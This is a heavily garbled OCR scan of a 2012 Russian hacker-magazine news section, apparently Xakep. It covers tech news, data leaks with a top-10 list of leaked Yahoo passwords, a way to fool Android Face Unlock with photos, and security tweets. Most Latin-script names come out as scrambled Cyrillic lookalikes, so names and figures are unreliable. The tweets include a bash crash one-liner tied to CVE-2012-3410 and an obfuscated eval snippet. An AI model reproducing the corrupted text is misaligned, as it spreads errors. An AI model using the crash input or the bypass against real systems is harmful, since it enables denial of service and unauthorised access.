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ПРО ОШИБКИ 

Когда смотришь натакие компании, как РагаІІеІз, кажет- 
ся, что у них всегда все было хорошо. Сложно представить, 
что в их жизни были неудачи, когда запущенный продукт не вы- 
стреливал, и сложнейшие периоды, когда денег не хватало даже 
на зарплату сотрудникам. Одурманенный историей скороспелых 
стартапов, ошибочно представляешь себе идеализированную 
картинку того, как небольшая софтверная фирма беспрепятствен- 
но превращается во всемирно известную компанию с многомил- 
лионными оборотами... И только когда поговоришь с человеком, 
который стоял у истоков и, болеетого, всегда отвечал за разработ- 
ку, понимаешь, насколько на самом деле сложен путь к успеху. 

Ядосихпорподсильным впечатлением от разговора 
со Станиславом Протасовым, сооснователем РагаІІеІз. У него 
мы взяли интервью для этого номера. Кажется, еще никтотак 
проникновенно и честно не рассказывал о сложностях, с кото- 
рыми пришлось столкнуться во время становления компании, 
и сделанных ошибках. В такие моменты хочется поглощать каж- 
дое с казанное слово: понимаешь, что это настоящий кладезь 
знаний для всех, кто создает новые продукты. Большинство 
зиссезз зіогіез успешных компаний, по сути, не более чем ин- 
тересное чтиво. Самое же полезное — анализ ошибок и кон- 
кретные рекомендации, как их избежать, от людей, которые 
знакомы с этим не понаслышке. 
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Российский хакер «вскрыл» Арр 
Біоге. Миллионы пользователей 
получили возможность 
бесплатно делать покупки 
внутри приложений. 
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МІСК050РТПРИ0БРЕТЕТ ФИРМУУАММЕК, 

занимающуюся разработкой социальных 
сервисов корпоративного класса. Сумма 
сделки — 1,2 миллиарда долларов. 



0ЧКИД0П0ЛНЕНН0Й 
РЕАЛЬНОСТИ ОТОЬУМРЫЗ 

АНОНСИРОВАНО ЕЩЕ ОДНО НОСИМОЕУСТРОЙСТВО 

□ ыло очевидно, что вследза очками боодіе Рго)есІ біазз 
вскоре потянутся и другие похожие проекты, но мы не 
думали, что это произойдет та к скоро. Компания ОІутрііз 
занимается разработкой дисплеев, при годных для ношения, с про- 
шлого года и даже успела продемонстрировать публике несколько 
прототипов. Но теперь, когда боодіе уже принимает пред вари - 
тельные заказы на боодіе Рго)есІ біазз, ОІутрііз решила не терять 
времени даром и официально анонсировала свой продукт с до- 
полнен ной реальностью — МЕ64.0. В отличие от системы боодіе, 
прототип носимого дисплея от японского производителя крепится 
на дужку очков и способен выдавать картинку с разрешением 
320 х 240 пикселей. Яркость ОѴбА-изображения может варьиро- 
ваться в пределах от 10 до 2000 кд/м 2 (этого вполне хватит для яркого 
дневного света). Сама система весит около 30 г и способна взаимо- 
действовать с мобильными устройствами через интерфейс ВІиеІооіЬ 
2.1. Встроенный акселерометр позволяет управлять устройством 
движениями головы. Устройство отображает информационное поле 
в области периферического зрения, где будет демонстрироваться 
навигационное положение пользователя и другая полезная инфор- 
мация. Таким образом, ОІутрііз МЕ64.0 вполне может использовать- 
ся, например, в навигационных задачах, предоставляя сведения 
о местоположении владельца с СРБ-модуля в смартфоне. О сроках 
релиза и стоимости девайса пока ничего не сообщается. 




Обещанноеврѳмя 
автономной работы 
устройства доходит 
до восьми часов 
привключениина 
пятнадцатьсекунд 
раз втри минуты. 



ХОЗЯИН, ЭТО точно ты? 

АВТОРИЗАЦИЮ ПО СНИМКУ ВЛАДЕЛЬЦА 
ВСЕ ЕЩЕ МОЖНО ОБОЙТИ 




ачиная с версии 4.0, в АпсІгоісІ появилась функция разбло- 
кировки смартфона Расе ІІпІоск, призванная увеличить 
безопасность. Увы, очень быстро выяснилось, что ее легко 
обмануть: достаточно показать устройству не лицо настоящего 
владельца, а обычную бумажную фотографию или фото, выведенное 
на экран любого устройства. Впрочем, боодіе всегда называла Расе 
ІІпІоск экспериментальной функцией, обладающей низким уровнем 
безопасности. Однако в АпсІгоісІ 4.1 « Э е 1 1 у Веап»появиласьотдельно 
включаемая функция Ыѵепезз СЬеск, которая требует, чтобы пользо- 
ватель моргнул во время аутентификации, — фотография, понятное 
дело, моргать не умеет. Казалось бы, уровень безопасности должен 
повыситься, но нет. Выяснилось, что с помощью графической обра- 
ботки и создания простенькой бІР-анимации можно без особых про- 
блем обмануть и Ыѵепезз СЬеск. Также не стоит забывать и о том, что, 
хотя перехитрить систему при помощи фото стало сложнее, ей все 
равно не стоит слишком уж доверять: она может спокойно открыть 
доступ к смартфону человеку, который лишь в общих чертах похож на 
владельца устройства :). Словом, пароли и РІІ\І-коды по-прежнему 
выглядятнадежнее. 





РАЗЛОЧЕННАЯ ВЕРСИЯ 
СМАРТФОНА 6АІ.АХУ5 III 
БУДЕТ ПРОДАВАТЬСЯ ПРЯМО 
СОФИЦИАЛЬНОГО САЙТА. 

Но купить Оеѵеіорег Есііііоп 
версиюсмогуттолько раз- 
работчики. 




ВХОДЕ НАСКЕК5 ОЫ РЬАЫЕТ 
ЕАРТН ХАКЕР С НИКОМ 

ВАУ продемонстрировал, 
что можно напечатать на 
30-принтере ключ от на- 
ручников (даже «сложных») 
иуспешноего применить. 




АРРЬЕ ДОГОВОРИЛАСЬ 
СТАЙВАНЬСКОЙ КОМПАНИЕЙ 
РКОѴІЕѴѴТЕСНМОЮСѴ, кото- 
рой принадлежатправа на 
слово «іРас!» в Китае. Арріе 
купит его за 60 миллионов 
долларов. 




ПОБЕДИТЕЛЕМ ЧЕМПИОНАТА 
ПО ПРОГРАММИРОВАНИЮ ѴК 
СЦР, проведенного «ВКон- 
такте», стал 16-летний про- 
граммистиз Китая ЮжуГу. 

В качестве приза он получил 
ЗОтысячдолларов. 




ВЫХОД ВЬАСКВЕККУ 10 
ОТКЛАДЫВАЕТСЯ ДО 2013 
ГОДА, сообщила компания 
ВезеагсИ Іп Моііоп. При- 
чина проста:задержки 
в подготовке программного 
обеспечения. 
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МЕ6АЫЕѴѴ5 



РАСШИРЕНИЯ СНКОМЕ ОТНЫНЕ МОГУТ ДЕМОНСТРИРОВАТЬ РЕКЛАМНЫЕ БАННЕРЫ НАСТОРОННИЕ САЙТЫ. Гугл разрешил. 



БОЛЬШОЙ БРАТ ВИДИТ 
ТЕБЯ НАСКВОЗЬ 



НЕОБЫЧНОЕ ПРИМЕНЕНИЕЗНАК0МЫХТЕХН0Л0ГИЙ 




Перед тобой не 
просто картинка 
«под рентген», 
это — реальный 
образецскана, 
которыйделает 
2ВѴ. 



□ се мы хорошо знакомы с рентген овскими сканерами — та кие устрой- 
ства, например, установлены в аэропортах многих стран мира. Не 
первый год ведутся дискуссии об этичности их применения. Дело в том, 
что перед взором оператора та кого устройства человек предстает практически 
без одежды. Зато сканер дает возможность быстро провести полный досмотр: 
сразу видно спрятанное оружие. 

Недавно журнал РогЬз поведал миру о том, что подобные девайсы можно 
встретить не только в аэропортах и больницах. Оказывается, рентгеновские 
сканеры, способные «видеть» сквозь стены и через одежду, уже давно 
доступны в коммерческой продаже в виде обычных фургонов! К примеру, 
компания Атегісап Зсіепсе & Епдіпеегіпд выпускает такие фургоны под 
брендом 2ВѴ [ 7 . Васкзсаиег Ѵап] и за последнее время продала более 500 
фургонов федеральным службам США и иностранным заказчикам. В фургонах 
2ВѴ установлено рентгеновское оборудование, которое направляет пучок 
излучения на другие автомобили и окружающие объекты: людей, сумки, 
подозрительные контейнеры и так далее. Такой фургон может просто 
проехать по автомобильной парковке, и оператор увидит, в каких машинах 
есть люди, какой товар находится внутри грузовых фур. Пока не совсем ясно 
лишьодно — имеютли правоохранительные органы право осуществлять 
подобные «обыски», пусть даже с помощью рентгеновских лучей, не имея 
ордера и не получая ничьего согласия. Может статься, что такое сканирование 
не является обыском, а значит, его можно применять, как фотоаппарат или 
видеокамеру, — без особого разрешения. 



САМЫЙ МОЛОДОЙ СЕРТИФИЦИРОВАННЫЙ СПЕЦИАЛИСТ МІСК050РТ 



ВОСЬМИЛЕТНИЙ ШОФАЙ 
ТХОБАНИ В ТОРЖЕСТВЕННОЙ 
ОБСТАНОВКЕ ПОЛУЧИЛ 
СЕРТИФИКАТ МІСК050РТ 
СЕКТІРІЕО ТЕСНЫОІ.ООѴ 
5РЕСІАЫ5Т 



ЕІРЕРОХ 05. УЖЕ СКОРО 



М02ІЫ.А ПРЕДСТАВИЛА СОБСТВЕННУЮ 
ОПЕРАЦИОННУЮ СИСТЕМУ 



ы уже рассказывали о проекте ВооИо Оеско (В26), 
над которымусерднотрудятся в МогіІІа. На- 
помним, что компания планировала превратить 
движокбеско, обеспечивающий работу браузера Рігеіюх, 
в операционную систему с открытым исходным кодом для 
телефонов и планшетов. 

Недавно МогіІІа выпустила пресс-релиз, в котором 
сообщалось, что проект ВооИо Зеско переименован — 
новая ОС будет поставляться под узнаваемым брендом 
Рігеіюх (предполагается, чтоэтодолжно вызвать интерес 
пользователей кновым смартфонам, выходящим на 
рынок). Также в пресс-релизе были раскрыты некоторые 
подробности относительно грядущей ОС. 

Рігеіюх 05 базируется на открытых веб-стандартах, 
предоставляя разработчикам приложений основанные 
на РІТМІ_5 компоненты для задействования всех возмож- 
ностей аппаратных устройств. МогіІІа традиционно гаран- 
тирует абсолютную открытость проекта и независимость 
разработки от коммерческих фирм. Компания намерена 
передать эталонную реализацию ѴѴеЬ АРІ, разработан- 
ного при создании РігеіюхОЗ, в организацию ѴѴЗС для 
утверждения в качестве веб-стандарта. При этом ѴѴеЬ АРІ 
по возможности базируется на уже принятых стандар- 
тах, лишь расширяя их в необходим ых на правлениях. 
Платформа изначально оптимизирована для начального 
сегмента смартфонов и лишена излишних промежуточных 
прослоек, что позволитмобильным операторам подгото- 
вить продукты, предоставляющие богатый набор функций 
по цене дешевых телефонов. 

Развиваемая в рамках проекта РігеіюхОЗ мобильная 
платформа базируется на идее использования браузерно- 
го окружения вместо рабочего стола. В отличие от СЬготе 
05, платформа Рігеіюх 05 ориентирована на мобильные 
устройства и предоставляетрасширенный ѴѴеЬАРІ для 
создания специализированных мобильных приложений, 
в полной мере использующих возможности современных 
телефонов. Основой служит ядро Ыпихи низкоуровневые 
компоненты из платформы АпбгоісІ. Вместо виртуальной 
машины Оаіѵікдлязапуска приложений задействован 
веб-стек МоііІІа. Для распространения обновлений 
в Рігеіюх 05 будут использоваться проверенные техноло- 
гии, применяемыепроектом Рігеіюх и каталога допол- 
нений для Рігеіюх. Приложения будутраспространяться 
через каталог-магазин МогіІІа Магкеіріасе, который будет 
поддерживать распространение как бесплатных, та к 
и платныхприложений. Пользовательский интерфейс 
платформы формируется из набора веб-приложений Оаіа. 

В егосостав войдутбраузер, калькулятор, календарь- 
планировщик, приложение для работы с веб-камерой, 
адресная книга, интерфейсдля осуществлениятелефон- 
ныхзвонков, клиентэлектронной почты, интерфейсдля 
5М5/ММ5 и та к дал ее. Вместо предоставления доступа 
к реальной файловой системе программы будут ограниче- 
ны внутри виртуальной ФС, построенной с использовани- 
ем ІпбехесЮВ АРІ и изолированной от основной системы. 
Созданныесиспользованием ѴѴеЬАРІ программы смогут 
работать нетолько в окружении РігеіюхОВ, но и в любом 
поддерживающем стандарты веб-стеке. Первые модели 
смартфонов, укомплектованныхновой ОС, выпустятком- 
панииТСІСоттипісаЬопТесЬпоІоду (АІсаІеІ) и 2ТЕ. Смарт- 
фоны с Рігеіюх 05 посту пят в продажу в начале 2013 года 
под брендом Ѵіѵо, принадлежащим компании Теіеіюпіса. 
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ѴѴѴ’ЧІШЬ 



молоко 






Вся продукция «ІЕВЬЕ МОЛОЧНИК- произведена из цельного 
(неаосстано влен него) молока очень высокого качества. 
Такой строгий контроль оказывается важным и для людей, 
заботящими о здоровье, поскольку а последнее время на рынке появилось 
^ .... мнацзюмелок и разбавлений как молока, так и продуктов изнын. 



ГиТД 




дшда 






шШ&Ш 




МЕ6АЫЕѴѴ5 ЭКСТРАДИЦИЮ ОСНОВАТЕЛЯ МЕСАІІРЮАОКИ МАДОТКОМАВ СШАотложили до марта 2013 года. Ким по-прежнему остается в Новой Зеландии. 



УТЕЧКИ ПРОШЛОГО МЕСЯЦА 

КАКИЕ КОМПАНИИ И СЕРВИСЫ ПРОШТРАФИЛИСЬ В ИЮЛЕ 



СОСТОЯЛСЯ ФИНАЛ 
ІМАОІЫЕ СЮР 2012 




епонятным образом в Сеть попали е-таіі-адреса 
пользователей популярнейшего облачного 
хранилища йгорЬох. Жители Германии, Нидер- 
ландов и Великобритании оставляют на форуме йгорЬох 
сообщения о том, что получают спам на адреса, созданные 
специальнодля использования йгорЬох. Для прояснения 
ситуации компания пригласила независимыхэкспертов. 
Хакерская группа ОЗЗйз Сотрапу выложила на своем 
сайте текстовый файл с указанием адресов электронной 
почты и паролей 453492 пользователей ѴаЬоо. Информа- 
ция явно собрана с помощью 501-инъекции — текстовый 
файл содержит бол ее 2700 названий табличных строк 
и столбцов, а также названия 298 переменных Му50І_. Экс- 
перты считают, что взломан сервисѴаЬоо Ѵоісе, поскольку 
в файле есть строка «бЬЫ. ас. ЬИ.уаЬоо. сот», а этот поддо- 
мен принадлежитименноему. 

Исполнительный директор сервиса вопросов и ответов 
Рогтзргіпд подтвердил, что база из 420 тысяч хешей, 
опубликованная на одном изхакерскихфорумов, действи- 
тельно принадлежитпользователям Рогтзргіпд. Рас- 
следование выявило, что неизвестный злоумышленник 
проник на один из серверов разработки и скопировал базу 
хешей. Уязвимостьвсистемеужезакрыта. Пароли всех 
пользователей Рогтзргіпд (а их более 22 миллионов!) при- 
нудительнодеактивированы, для входа на сайттребуется 
сменитьпароль. 




Тор-10 паролей 
Ѵаііоо, основываясь 
наутечке: 

123456 

1666(0,38%) 

РЭ55ѴѴ0ГСІ 

780(0,18%) 

ѵѵеісоте 

436(0,1%) 

піп)а 

333(0,08%) 

аЬс123 

250(0,06%) 

123456789 

222(0,05%) 

12345678 

208(0,05%) 

зипзЬіпе 

205(0,05%) 

РГІПСѲ55 

202(0,05%) 

^ѵѵег^у 

172(0,04%) 



ПОБЕДУ В СОСТЯЗАНИИ ОДЕРЖАЛА 
КОМАНДАУКРАИНЫ 

□ конце июля в Сиднее прошел финал конкурса 
МісгозоЙ Ітадіпе Сир 2012, отметившего в этом 
году своедесятилетие. Пятьдней студенты со 
всего мира представляли свои проекты судейским кол- 
легиям и принимали участие в обучающих сессиях. Всего 
в международном финале всемирного студенческого 
кубка технологий принял и участие бол ее 350 студентов 
из 75 стран мира. Россию в финале представляла томская 
команда Вощоиг Оеѵеіортепі — студенты ТУСУРа, МФТИ 
и аспирант ИПП И РАН. Но победа в конкурсе впервые оста- 
ласьза командойУкраины. Команда ОиасІздиасІ показала 
на конкурсесистемудля помощи немымлюдям ЕпаЫе 
Таік. Специальные перчатки, оснащенные множеством 
сенсоров и датчиков движения, переда ют да иные о жестах 
на мобильноеустройство. Данныеанализируются, рас- 
познаются, и генерируется голосовоесообщение — таким 
образом систематранслируетязыкжестов вобычную 
речь, и немые люди могутобрести «электронный голос». 
Команды -победители получили призы в размере 25, 10 
и 5 тысяч долларов США за первое, второе и третье места 
соответственно. Российская команда Вощоиг Оеѵеіортепі 
представила свой проект М. й. Ѵоісе. С помощью ѴѴіпсІоѵѵз 
РЬопе 7 студенты разработали метод ранней диагностики 
заболеваний гортани на основе анализа изменения голо- 
са. Проектбыл признан лучшим в России, получил высокие 
оценки международного жюри в Австралии, но входе 
отборочного тура в суперфинал не прошел. 





Р-5ЕС1ЖЕ СООБЩИЛАО НОВОМ 
ВРЕДОНОСЕ, КОТОРЫЙ НЕ 
ОГРАНИЧИВАЕТСЯ ЗАРАЖЕНИ- 
ЕМ ТОЛЬКО ѴѴІЫ00ѴѴ5-МАШИН, 

НО СПОСОБЕН РАСПОЗНАВАТЬ 
РАЗЛИЧНЫЕ ОС: ѴѴіпсІоѵѵз, Мае 05 
иЫпихииспользоватьсоответ- 
ствующий эксплойт для каждой 
конкретной ОС. Малварь получи- 
ла имена Тгоіап-РоѵѵпІоасІепЗаѵа/ 
6еі5ЬеІІ.А, ВасксІоопОЗХ/ 
беіЗЬеІІ.А, Васке)оог:І_іпих/ 
беіЗИеІІ.Аи Васкс1оог:ѴѴ32/ 
беіБНеІІ.А. 





ЕЩЕ ДВОЕ УЧАСТНИКОВ ХАК- 
ГРУППЫ ІЖ25ЕС (20-летний 
Райен Клири и 19-летний 
Джейк Девис) признали свою 
вину входе очередного засе- 
дания суда в Великобритании. 



462 ИЗ 500 (БОЛЕЕ 90%) 
САМЫХ БЫСТРЫХ КОМПЬЮ- 
ТЕРОВ ПЛАНЕТЫ РАБОТАЮТ 
ПОД УПРАВЛЕНИЕМ *№Х- 
СИСТЕМ,сообщаетрейтинг 
ТОР500 самых мощных 
суперкомпьютеров. 
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ПОДПИШИСЬ! 



8-800-200-3-999 

+7 (495) 663-82-77 (бесплатно) 



Редакционная подписка без посредников — это 
гарантия получения важного для Вас журнала 
и экономия до 40% от розничной цены в киоске. 







6 номеров — 1194 руб. 
12 номеров — 2149 руб. 



6 номеров — 810 руб. 

12 номеров — 1499 руб. 



6 номеров — 1110 руб. 
12 номеров — 1999 руб. 



6 номеров — 894 руб. 

12 номеров — 1699 руб. 







6 номеров — 564 руб. 

1 3 номеров — 1105 руб. 



6 номеров — 599 руб. 

1 2 номеров — 1188 руб. 



6 номеров — 1110 руб. 
12 номеров — 1999 руб. 



6 номеров — 810 руб. 

12 номеров — 1499 руб. 




3 номера — 630 руб. 

6 номеров — 1140 руб. 




6 номеров — 895 руб. 
12 номеров — 1699 руб. 



’Шрсяш 




6 номеров — 690 руб. 

12 номеров — 1249 руб. 




6 номеров — 775 руб. 

12 номеров — 1399 руб. 






6 номеров — 1110 руб. 
12 номеров — 1999 руб. 



6 номеров — 1110 руб. 
12 номеров — 1999 руб. 



6 номеров — 950 руб. 

12 номеров — 1699 руб. 



(дате)ІаіШ 

зНор.дІс.ги 











МЕ6АЫЕѴѴ5 



ПОЧТОВЫМ СЕРВИСОМ СМАИП0ЛЬЗУЕТСЯ425МИЛЛИ0Н0ВЧЕЛ0ВЕК ПО ВСЕМУ МИРУ, сообщаетбоодіе. 



НЕЙРОННОЙ СЕТИ 6006І_Е НРАВЯТСЯ КОТИКИ 



СООСЬЕ УСПЕШНО СИМУЛИРУЕТ РАБОТУ РЕАЛЬНОГО ГОЛОВНОГО МОЗГА 



одразделениеХ І_аЬ, «секретная лаборатория» 
компании Зоодіе, совместно сучеными из Стэн- 
фордскогоуниверситета опубликовала отчет, 
в котором сообщается, что ученым компании удалось 
создать крупнейшую самообучающуюся компьютерную 
нейронную сеть. Напомним, чтоХ І_аЬ хорошо известна 
всему миру именно благодаря различным инновацион- 
ным проектам, вроде беспилотных автомобилей, управ- 
ляемых компьютером, или очков дополненной реально- 
сти. Теперь вот настал черед нейронной сети. 

Ученые рассказали, что на протяжении нескольких 
лет работали над симуляцией человеческого мозга, 
в ходе чего и была создана одна из крупнейших в истории 
нейронных сетей для машинного обучения. Сеть была 
построена на 16 тысячах процессоров. В результате 
исследователи смоделировали систему с примерно мил- 
лиардом взаимосвязей между отдельными процессами 
(нейронами). Для сравнения: до этого в экспериментах 
по машинному обучению применялись сети разве что 
с 1-10 миллионами связей. 

Самый интересный нюанс состоит в том, что, обеспе- 
чив нейронной сети доступ в интернет, ученые позволили 
ей обучаться самостоятельно. В качестве материала 
для работы сеть использовала видеоролики с УоиТиЬе. 

ЕЙ демонстрировались случайные изображения. Изучив 
около 10 миллионов рандомных цифровых картинок, взя- 
тых из видеороликов, нейронная сеть самостоятельно 
научилась... распознавать изображения кошек :). Ученые 
уверяют, что эффект, полученный отданного исследова- 
ния, сильно удивил даже их самих, ведь сеть самостоя- 
тельно смоделировала изображение кошки, и результат 
вышел куда более точным, если сравнивать его с другими 
объектами в аналогичных экспериментах. Проведенное 
исследование вообще представляет собой новое слово 
в компьютерной науке, которое стало возможнотолько 
благодаря падению стоимости компьютерных вычис- 
лений и доступности огромных кластеров компьютеров 
в гигантских дата-центрах. 

Новизна этого эксперимента заключается в том, что 
раньше при создании похожих нейронных сетей люди 
наблюдали за обучением компьютерного интеллекта 
и управляли им, а в этот раз машины получили полную 
свободу. Дело в том, что существующие в наше время 




алгоритмы машинного обучения почти все основаны 
на анализе огромного количества экспериментальных 
данных. Например, чтобы натренировать систему на ви- 
зуальное распознание ноутбуков, необходимо предва- 
рительно показать ей множество фотографий, обозна- 
ченных как «ноутбуки». Как правило, такие системы 
используются для расп оз на ван ия устной речи, анализа 
изображений, проверки сообщений на спам. «Мы никог- 
да не говорили сети в процессе тренировок: „это кошка". 
Таким образом, машина фактически сама изобрела для 
себя концепцию кошки», — поясняет Джефф Дин, ученый 
из исследовательской лаборатории Зоодіе. Нейронная 
сеть Зоодіе самостоятельно сформировала размытое 
изображение кошки, использовав наборы изображений 
разных котов из памяти. Ученые говорят, что на примере 
этой сети им впервые удалось повторить процесс обуче- 
ния, который происходит в человеческом мозге. 




□ Нейроннаясеть«просмо- 
трела» более 10 миллионов 
картинок и распознала имен- 
но изображение кошки л ишь 
потому, что картинки сэтими 
животными встречаются 
в Сети чаще всего. 




БИЛЛ ГЕИТСОБ ИСПОЛЬЗОВАНИИ ПЛАНШЕТОВ В ОБРАЗОВАНИИ: 



«ОБУЧЕНИЕ 
НА УСТРОЙСТВЕ 
БЕЗ КЛАВИАТУРНОГО 
ВВОДА НЕЭФФЕКТИВНО. 
ДЕТЯМ НУЖНО 
РАЗВИВАТЬ МОТОРИКУ 
И УЧИТЬСЯ ПИСАТЬ» 
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Ьаскегіѵѵееіз 



(Зеа_(оипсІа(іоп 

СЙ Это точно, что вся х86 полна 

сексизма. Каждый шелл-кодер 

™ знает: тоѵ аі, ЫР_ехесѵе 

едиаіз ОхЬООЬ. РЕ: ОхВ 1 6В00В5 

Н Комментарий: 

Недавний шум на тему того, что 
в коде ядра Линукса была найдена строка: 
ОхВ 1 6В00В5 (Ьід ЬооЬб]. Разработчики изви- 
нились за это. Кстати, в коде МісгозоК было 
похожее: ОхОВООВІ 35 (ЬооЫез). Вот это я 
называю настоящим статическим анализом 
кода! 



(35кер(іс_(х 

х=еѵаІ, 1 , 1 , 1 ; 1 ; 1,1,1,Ь='\Ѵ, 1,1,1; 
1,1,1,5='\", 1,1,1; 1,1, 1,0=0', 1,1,1; х 
(х(з+Ь+1 41 +Ь+1 54+Ь+1 45+Ь+1 62+Ь 
+1 64+Ь+о+50+Ь+о+61 +Ь+о+51 +5І); 

□ Комментарий: 

Угадай, почему так? 



СЭІІіегсІі 

Анонсируем: МоЬіІе Рѵѵп20ѵѵп 
2012: #рѵѵп2оѵѵп 

□ Комментарий: 

1 \) I расширила свое мероприятие 
Рѵѵп20ѵѵп. Таким образом, в сентябре 
в Амстердаме на ЕІІБесѴѴезІ пройдет кон- 
курс по взлому мобильных устройств через 
следующие векторы: МоЬіІе ѴѴеЬ Вгоѵѵзегз, 
Ыеаг РіеІсІ Соттипісаііоп (ЫРС), БЬогІ 
Меззаде Бегѵісе (5МБ), СеІІиІаг ВазеЬапсІ. 



гаѵцрЕм 

Блог: продвинутая эксплуатация 
ІЕ9 М5ХМІ_ ІІпіпіІіаІііесІ Метогу 
М51 2-043 с обходом А5І_РД)ЕР... 
используя ТОЛЬКО РОВ! 



(ЗсІ_оІех 

ѴМѵѵаге эксплойт для побега 
из гостевой ОС Ьу ЙРіоІгВапіа 

Ьі1.Іѵ/ОРдіп5 

□ Комментарий: 

Эксплойт, может, и старый, но таких 
вот эксплойтов практически нет, и потому 
он очень полезен для изучения. 



га0ЕѴ0Р5_В0КАТ 

Источники из СЕРЫ сообщили, 
что монументальная задача для 
них — это поиск следов Ыпих на 
рабочем столе. 

□ Комментарий: 

Шутка шуткой, но у СЕРЫ свой дис- 
триб Ыпих (БсіепІіТіс Ыпих), который и помог 
в обнаружении бозона Хиггса! 



ГааатіпБаІеЬі 

Ргот Риззіа ШЬ І_оѵе!!! РТ О 
РіоІгВапіа: 

Н Комментарий: 

Шутка в Твиттере о том, что в СПб 
требуется разработчик малвари, осталась 
шуткой, тем не менее, по словам автора, 
ему пришло несколько резюме: два из 
России, одно из Восточной Европы, одно 
из Франции, а одно даже из Кении! 



(Эккоіоѵѵісг 

Только что получил е-таіі 
с благодарностями от опенсорс- 
ного вендора. Каждый должен 
попробовать гезропзіЫе сіізсіозиге! 



(ЭБІеѵеЗІгега 

^ аііаз рІеазе=зисІо 



- . 



гаАдаггі_РР 

Отличный ЬазЬ сгазЬег: «Іезі -е 
/беѵМі 111111111111111111111 
11111111111 » 

СѴЕ-201 2-341 0 



(3(охо4ка 

«Я СІ50, я не хочу принимать 
решения. Я хочу все запретить» 



И! 



(ЭадиБІіпдіаппі 

Интерактивный компилятор 
для С++. Угарно и полезно: 

дсс.досІЬоІЕогд. 



Н Комментарий: 

Реально полезная ссылка. Особенно 
если ты пишешь шелл-код 8) 



(ВеБІгкиг: 

(9Ю_АА_Сагтаск 
Удивился, обнаружив, что С++ 
ч по-тихому конвертирует ^аізе 
в любой указатель как 0. Безвредно по срав- 
нению с геіигп І\ІІИ_І_, но позволяет вызывать 
плохие функции. 
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МЕ6АЫЕѴѴ5 В ХВОХ ИѴЕ ТЕПЕРЬ РЕАЛИЗОВАНА ДВУХУРОВНЕВАЯ АУТЕНТИФИКАЦИЯ — с кодом подтверждения, высылаемым по 5М5 или е-таіі. 



ПЕРЕДАЧАДАННЫХЧЕРЕЗТЕЛО 
ЧЕЛОВЕКАУЖЕ РЕАЛЬНОСТЬ 



БЕЗУМНАЯ, НО РАБОТОСПОСОБНАЯ ТЕХНОЛОГИЯ ЕШС550Ы 




□ компании Егісззоп явно работают настоящие по- 
клонники киберпанка и энтузиасты своего дела. 
Исследователи Егісззоп продемонстрировали 
высокоскоростную передачу да иных прямо через чело- 
веческое тело! Технология получила говорящее название 
Соппесіеб Ме. Какнетрудно догадаться, разработка 
призвана соединять человека с любой техникой (делает- 
ся это при помощи смартфона). Соппесіеб Ме позволяет 
передавать информацию на скоростях в 6-10 Мбит/с, но 
и 20-40 Мбит/с — реальнаязадача. Разработка имеет 
чрезвычайно низкоеэлектропотребление, небольшую 
стоимость, нетребуетспециальныхпереходников, что 
дает возможность массового внедрения. Для использо- 
вания Соппесіеб Ме нужны только смартфон и приемник, 
оснащенныеспециальной цифровой схемой, которая 
позволит передавать да иные при помощи электромагнит- 
ных полей, что образуются между заземленным чело- 
веческим телом — передатчиком (Тх) и приемником (Рх) 
электрода. Схема подключена к пластине, пересылающей 
сигналы в тело. Аналогичная схема работает в приемни- 
ке, определяя сигнал, прошедший через человеческий 
организм. С помощью Соппесіеб Ме можно будет, напри- 
мер, расплатиться в магазине просто оттиском руки, без 
использования банковской карты, или обменяться визит- 
ками при рукопожатии. Какиеужтутметки ЫРС. 



Влаборатории 

ЕгісББОптехноло- 

гияСоппесІесІМе 

прошла множество 

тестов, которые 

показали, что все 

оборудование 

безопасно.Чипы 

СоппесІесІМе 

поступятна рынок 

втечение12-18 

месяцев, Егісббоп 

предполагает, что 

онимогутпоявить- 

сянасмартфонах, 

персональных 

компьютерах, 

телевизорах 

и принтерах. 



«ЛАБОРАТОРИЯ 

КАСПЕРСКОГО» 

разрабатывает 

СВОЮ ОС 

ПЛАНЫ КА5РЕК5КѴ І_АВ РАССЕКРЕТИЛ 
РЕКРУТИНГОВЫЙ САЙТ 




и каких официальных заявлений «Лаборатория 
Касперского»пока неделала, нопара вакансий, 
недавнопоявившихся на НеасШипІег, может 
свидетельствовать о том, что в компании идет работа 
над собственной «безопасной операционной системой». 

В объявлен иях о найме Л К предлагает работу аналитику 
требований в новом проекте и старшему разработчику 
систем обеспечения безопасности АСУТП /ЗСАйА. Обе 
вакансии начинаются со слов о том, что в «Лаборатории 
Касперского» в течение весьма длительного времени идет 
разработка новой безопасной ОС. Изтекста объявлений 
можно понять, что главной сферой применения «новой 
безопасной ОС», скорее всего, станутпромышленные 
информационные системы (АСУТП — автоматизирован- 
ные системы управления технологическими процессами). 
Соискатель должен не только соответствовать обычным 
требованиям технологических компаний, но и обладать 
опытом работы сдиспетчерским ПО (5СА0А), промышлен- 
ными протоколами и контроллерами. Отстаршего разра- 
ботчика, помимо опыта программирования АСУТП иЗСАйА, 
умения работатьсперечнем протоколов (РгоПЬиз, МосІЬиз, 
ОРС, йИР, Іпсііізігіаі ЕЛіегпеі) и контроллеров, требуется 
знание системы реального времени ОЫХ и опыт программи- 
рования для СУБД. 





РАЗРАБОТЧИКИ СВЕРХ- 
ДЕШЕВОГО КОМПЬЮТЕРА 
КА5РВЕККѴРІ ПРЕДСТАВИЛИ 
СОБСТВЕННУЮ ОПЕРАЦИ- 
ОННУЮ СИСТЕМУ РА5РВІАЫ 
— дистрибутив І_іпих, создан- 
ный на основе йеЫап. 



МІСК050РТ МОЖЕТ ГОР- 
ДИТЬСЯ— НА50%КОМПЬЮ- 
ТЕРОВ В МИРЕ УСТАНОВЛЕ- 
НА ѴУІИ00ѴУ5 7, подсчитал 
ЗіаіСоипІег. Рубеж в 50% 
компании удалось преодо- 
летьвиюне2012года. 



ВИДЕОХОСТИНГѴОІГШВЕ 
ОБЗАВЕЛСЯ ИНСТРУМЕН- 
ТОМ ДЛЯ АВТОМАТИЧЕСКО- 
ГО РАЗМЫТИЯ ЛИЦЛЮДЕЙ 
НАВИДЕОЗАПИСЯХ. Теперь 
скрыть лица можно букваль- 
но в два клика. 



СТАЛО ИЗВЕСТНО, В КА- 
КУЮ СУММУ ОБОЙДЕТСЯ 
ОБНОВЛЕНИЕ СИСТЕМЫ ДО 
ѴѴІИ00ѴѴ58ДЛЯ ПОЛЬЗОВА- 
ТЕЛЕЙ ѴУІЫ00ѴѴ5ХР,ѴІ5ТА 
ИЛИ 7, — цена апгрейда 
составит39,99 доллара. 



ПРИДУМАТЬ НОВОЕ ИМЯ 
ДИСТРИБУТИВУ МАИОКІѴА 
РЕШИЛИ ВСЕМ МИРОМ — при 

помощи опроса. В итоге боль- 
ше всего голосов было отдано 
за название Мапсіаіа І_іпих. 
